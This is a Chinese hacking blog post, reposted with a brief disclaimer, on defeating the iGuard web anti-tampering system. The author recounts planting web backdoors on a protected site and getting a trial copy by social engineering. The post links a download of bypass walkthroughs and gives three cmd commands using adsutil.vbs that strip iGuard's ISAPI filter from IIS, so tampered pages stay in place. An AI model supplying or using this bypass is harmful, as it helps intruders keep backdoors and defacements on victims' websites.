摘要: 前段时间在搞一个受到网页防篡改保护的网站,之前不知道有这东西,后来在植入web后门的时候,老是被删掉,郁闷… 困扰了整整一天后,在翻看C盘时,发现根目录下一个奇怪的文件夹"Tercel",找了几个文件研究,才知道这里有一个叫iGuard的网页防篡改…汗死不懂这...
前段时间在搞一个受到网页防篡改保护的网站,之前不知道有这东西,后来在植入web后门的时候,老是被删掉,郁闷…
困扰了整整一天后,在翻看C盘时,发现根目录下一个奇怪的文件夹"Tercel",找了几个文件研究,才知道这里有一个叫iGuard的网页防篡改…汗死不懂这东西,立即google恶补下,找到官网,居然不提供下载,囧~~
不过,根据我的经验,不提供下载的软件基本上都会有一堆毛病,哈哈…
之后通过社工骗取了一套试用版,接下来的2天里,通过在虚拟机中反复测试,终于把这东西的原理摸熟了,并找到8种办法突破iGuard的保护,其中有几种不用管理员权限就能突破。2天的成果,分享出来让后来者少走弯路,以后再遇到这种系统保护的网站要绕过它就轻车熟路了。
这里先简单说下iGuard的原理,这东西会在IIS/Apache中安插一个ISAPI过滤器(ISAPI Filter)/Apache模块,这个模块对你请求的每一个网页都计算一下它的MD5值,然后跟自己MD5库中记录的进行比较,如果一致就说明没有篡改,放行通过,如果不一致,就拦截,并立即恢复网页(这也是为什么之前我在网页中插入后门,然后访问后门,就会立即被删除的原因)。
OK,知己知彼,百战不殆,在理解了它的原理后,要对付它就容易多了,何况这个iGuard设计上就有众多安全隐患。
因为突破方法比较多,所以我打包成一个rar(视频+文字解说)。
邪8这里上传15MB的附件老是出错,郁闷,没法子,只好放过地方了,下载地址:
http://www.vdisk.cn/user/admin/tempuser1377003355
如果比较懒,不想看详细视频演示资料,可以直接用下面的这个方法让iGuard失效:
原理:因为iGuard 数字水印检测功能的实现,完全依赖于一个 ISAPI 筛选器模块,只要把这个筛选器删除,就可以让篡改网页随意留出了…不管这个iGuard是不是双机部署,不管采取什么水印,立刻统统失效。
操作:用下面三条cmd命令,就可以把iGuard的 ISAPI 筛选器模块删掉。
代码:
//cmd 查找 iGuard 的 ISAPI 筛选器模块,同时获取网站ID…
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs enum_all w3svc /p | find "iguard" /i
//cmd 获取指定网站的 FilterLoadOrder 序列…
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs get w3svc/xxx/filters/FilterLoadOrder
//cmd 设置新的 FilterLoadOrder 序列到指定网站…
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set w3svc/xxx/filters/FilterLoadOrder ""
删除iGuard的 ISAPI 筛选器模块后,咱们就可以随意修改网页了,hoho~~
原文地址:http://blog.csdn.net/cnbird2008/article/details/10215405
游侠简评:
网站转载仅作技术讨论用,请勿作恶!
补充下:很多网站安全软件,特别是Windows下的,都依赖于ISAPI……你懂的。
游侠安全网(www.youxia.org)期待您的原创文章!
